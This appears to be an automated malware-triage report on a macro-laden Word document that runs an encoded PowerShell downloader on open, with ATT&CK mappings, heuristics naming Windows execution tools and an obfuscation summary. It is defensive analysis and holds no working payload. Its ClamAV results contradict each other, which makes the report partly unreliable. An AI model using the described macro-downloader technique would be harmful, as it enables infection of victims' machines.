Verdict: MALICIOUS
Risk Score: 172
Malware Insights
MITRE ATT&CK:
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with a Document_Open subroutine that executes a PowerShell command. This command decodes and executes a Base64-encoded string, which likely downloads and runs a second-stage payload. The presence of the PowerShell execution and the ClamAV detection strongly indicate a downloader malware.
Heuristics (7)
- ClamAV: Doc.Downloader.Sload-6741782-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Sload-6741782-0
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- LOLBin token sequence in document text [high, SE_LOLBIN_RUN_COMMAND]: Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
- VBA macros detected [medium, OLE_VBA_MACROS] (1 related finding): Document contains VBA macro code
- Document_Open macro [low, OLE_VBA_DOCOPEN]: Document_Open macro. Matched line in script: Attribute VB_Customizable = True Private Sub Document_open() Dim wDTiIL(2)
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20069 bytes |

SHA-256: fec6c537dd373687d47977f4d0ba0424390033b9a21d1e9e9895550f68107a2a
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 274 of 366 identifiers look randomly generated (e.g. 'vSicFOIiWaDcRBMlVMNwjaam'), consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script